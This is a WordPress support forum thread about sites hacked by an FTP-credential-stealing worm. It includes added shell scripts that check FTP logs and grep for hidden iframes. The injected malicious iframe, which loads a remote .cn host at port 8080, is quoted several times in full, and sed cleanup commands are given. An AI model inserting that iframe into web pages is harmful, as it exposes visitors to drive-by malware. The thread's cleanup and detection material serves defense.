• My site was up & running successfully for about a week. I posted to the blog last night…everything was fine.

    Today when I went to the site I was greeted with this error:

    Warning: Unexpected character in input: ”’ (ASCII=39) state=1 in /home/petversa/public_html/blog/index.php on line 17

    Parse error: syntax error, unexpected ‘.’ in /home/petversa/public_html/blog/index.php on line 17

    I didn’t modify the index file in any way, so I’m stumped as to why I’m getting the error. I attempted to re-load the original index file from the template, but received this error:

    Fatal error: Call to undefined function get_header() in /home/petversa/public_html/blog/index.php on line 1

    Here’s the content in the index.php file.

    <?php
    /**
    * Front to the WordPress application. This file doesn’t do anything, but loads
    * wp-blog-header.php which does and tells WordPress to load the theme.
    *
    * @package WordPress
    */

    /**
    * Tells WordPress to load the WordPress theme and output it.
    *
    * @var bool
    */
    define('WP_USE_THEMES', true);

    /** Loads the WordPress Environment and Template */
    require('./wp-blog-
    <iframe src="https://technologybigtop.cn:8080/ts/in.cgi?pepsi14" width=12 height=12 style="visibility: hidden"></iframe>

    Any help would be most appreciated!

Viewing 8 replies - 1 through 8 (of 8 total)
  • <iframe src="https://technologybigtop.cn:8080/ts/in.cgi?pepsi14" width=12 height=12 style="visibility: hidden"></iframe>

    this line tells me you have been hacked
    you need to report this to your host immediately
    look through all index files on your site for this sort of injection
    search these forums for hacked blogs and you can see some good advice

    This is a virus / worm that steals your ftp login information from your ftp programs and modifies lots of php / html / htm pages on all of the sites it can access.

    We got hit yesterday and it modified hundreds of different websites, from small blogs up to large commercial websites.

    You will find lots of entries in your ftp logfile showing someone downloading the file and then re-uploading it again.

    It appears to destructively modify the files overwriting whatever text was there – the file size will be the same after it’s been modified.

    These commands will remove the code and replace it with a space character:

    find . -name '*.php' -exec sed -i 's#<iframe src="https://technologybigtop.cn:8080/ts/in.cgi?pepsi14" width=12 height=12 style="visibility: hidden"></iframe># #' {} \;
    find . -name '*.html' -exec sed -i 's#<iframe src="https://technologybigtop.cn:8080/ts/in.cgi?pepsi14" width=12 height=12 style="visibility: hidden"></iframe># #' {} \;
    find . -name '*.htm' -exec sed -i 's#<iframe src="https://technologybigtop.cn:8080/ts/in.cgi?pepsi14" width=12 height=12 style="visibility: hidden"></iframe># #' {} \;
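
The download-then-re-upload pattern described in the post above, together with the unchanged file size it mentions, can be searched for in the FTP transfer log. This is an added example, not part of the original posts; it assumes the server writes xferlog-format logs, and the function names, addresses, account and paths are constructed.

```shell
#!/bin/sh
# Added example, not from the thread. Assumes xferlog-format FTP transfer logs.
# Fields used: $7 host, $8 bytes, $9 path, $12 direction (o=download,
# i=upload), $14 account, $18 status (c=complete).

# Print "host account path bytes" for every file that one host/account
# downloaded and then re-uploaded with an identical byte count.
find_rewritten_files() {
    awk '
        NF >= 18 && $18 == "c" {
            key = $7 SUBSEP $14 SUBSEP $9
            if ($12 == "o") {
                fetched[key] = $8              # remember size of the download
            } else if ($12 == "i" && (key in fetched) && fetched[key] == $8) {
                print $7, $14, $9, $8          # same size written back
                delete fetched[key]
            }
        }
    ' "$1"
}

# Constructed sample log (documentation addresses, made-up account and paths).
write_sample_log() {
    cat > "$1" <<'EOF'
Mon Jan  5 03:12:01 2009 1 203.0.113.7 397 /public_html/blog/index.php b _ o r exampleuser ftp 0 * c
Mon Jan  5 03:12:02 2009 1 203.0.113.7 397 /public_html/blog/index.php b _ i r exampleuser ftp 0 * c
Mon Jan  5 03:12:04 2009 1 203.0.113.7 5120 /public_html/shop/index.html b _ o r exampleuser ftp 0 * c
Mon Jan  5 03:12:05 2009 1 203.0.113.7 5120 /public_html/shop/index.html b _ i r exampleuser ftp 0 * c
Mon Jan  5 09:30:10 2009 1 198.51.100.20 900 /public_html/style.css b _ o r exampleuser ftp 0 * c
Mon Jan  5 09:41:55 2009 1 198.51.100.20 955 /public_html/style.css b _ i r exampleuser ftp 0 * c
Mon Jan  5 09:45:00 2009 1 198.51.100.20 2210 /public_html/new-post.html b _ i r exampleuser ftp 0 * c
EOF
}

# Demo run on the constructed log.
log=$(mktemp)
write_sample_log "$log"
find_rewritten_files "$log"
rm -f "$log"
```

An ordinary edit (style.css, size changed) and a fresh upload (new-post.html) are not reported; only same-size write-backs are.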

    Thread Starter kaycedesign

    (@kaycedesign)

    Thanks neilmc — that’s exactly what happened. How did you remedy the virus? Whatever it was hacked into all my FTP sites (WordPress & others). I want to make sure it doesn’t happen again, and that the worm is completely removed.

    I ran Spy Sweeper and it found Trojan-pushu and Trojan-backdoor-stinkbreath. I’m guessing this was the cause. Quarantined & deleted, only to discover the Trojans had returned when I ran another sweep later in the day.

    Any advice?

    I’m having the same problem with this issue. Do I need to just cut the:

    <iframe src="https://technologybigtop.cn:8080/ts/in.cgi?pepsi14" width=12 height=12 style="visibility: hidden"></iframe>

    out of the PHP Index file?

    Thanks in advance!

    Do I need to just cut the:

    <iframe src="https://technologybigtop.cn:8080/ts/in.cgi?pepsi14" width=12 height=12 style="visibility: hidden"></iframe>

    out of the PHP Index file?

    no that alone won’t do it
    all of your index files will be affected and likely it will be in your database
    you need to contact your host and inform them
    you need to replace all of your index files and do a grep or search on the other files at your site
    you need to upload a database backup of before this happened.
    you need to search these forums for more solutions
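
A read-only way to do the search the reply above recommends before changing any file, as an added example that is not part of the original posts. It goes beyond the one URL quoted in the thread by matching any hidden or tiny iframe; the function names and sample files are constructed. Since an earlier post reports that the injection overwrites existing text, files it lists need restoring from a clean copy rather than just having the tag cut out.

```shell
#!/bin/sh
# Added example, not from the thread. Read-only: it lists files, changes nothing.

# List .php/.html/.htm files under $1 that contain an <iframe> styled hidden
# or given a one- or two-digit width/height, like the tag quoted in the thread.
list_hidden_iframes() {
    find "$1" -type f \( -name '*.php' -o -name '*.html' -o -name '*.htm' \) \
        -exec grep -l -i -E \
        '<iframe[^>]*(visibility: *hidden|display: *none|(width|height)= *["'\'']?[0-9]{1,2}([^0-9%]|$))' \
        {} + | sort
}

# Constructed sample tree; the .example hosts are placeholders.
make_sample_tree() {
    mkdir -p "$1/blog"
    # Clean front controller.
    printf '%s\n' '<?php' "require('./wp-blog-header.php');" > "$1/index.php"
    # Truncated require followed by the injected tag, as in the first post.
    printf '%s\n' '<?php' "require('./wp-blog-" \
        '<iframe src="https://injected.example:8080/x" width=12 height=12 style="visibility: hidden"></iframe>' \
        > "$1/blog/index.php"
    # Upper-case variant hidden with display:none.
    printf '%s\n' '<IFRAME SRC="https://injected.example/y" STYLE="display:none"></IFRAME>' \
        > "$1/about.htm"
    # Legitimate, visible embed that must not be reported.
    printf '%s\n' '<iframe src="https://video.example/embed" width="640" height="360"></iframe>' \
        > "$1/video.html"
}

# Demo run on the constructed tree.
tree=$(mktemp -d)
make_sample_tree "$tree"
list_hidden_iframes "$tree"
rm -rf "$tree"
```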

    I have a similar issue, but I cannot even log in. What do I do?

    Warning: Unexpected character in input: ”’ (ASCII=39) state=1 in /home/content/b/e/o/beoleary/html/profilingguru/index.php on line 17

    Parse error: syntax error, unexpected ‘.’ in /home/content/b/e/o/beoleary/html/profilingguru/index.php on line 17

    I replaced my index.php from a backup and that worked. I suppose this is the only text that has to be present.

    <?php
    /**
    * Front to the WordPress application. This file doesn’t do anything, but loads
    * wp-blog-header.php which does and tells WordPress to load the theme.
    *
    * @package WordPress
    */

    /**
    * Tells WordPress to load the WordPress theme and output it.
    *
    * @var bool
    */
    define('WP_USE_THEMES', true);

    /** Loads the WordPress Environment and Template */
    require('./wp-blog-header.php');
    ?>

    I tried the above, now I get:

    Parse error: syntax error, unexpected T_STRING in /home/content/b/e/o/beoleary/html/profilingguru/wp-includes/default-filters.php on line 207

  • The topic ‘Help Please! Warning: Unexpected character in input’ is closed to new replies.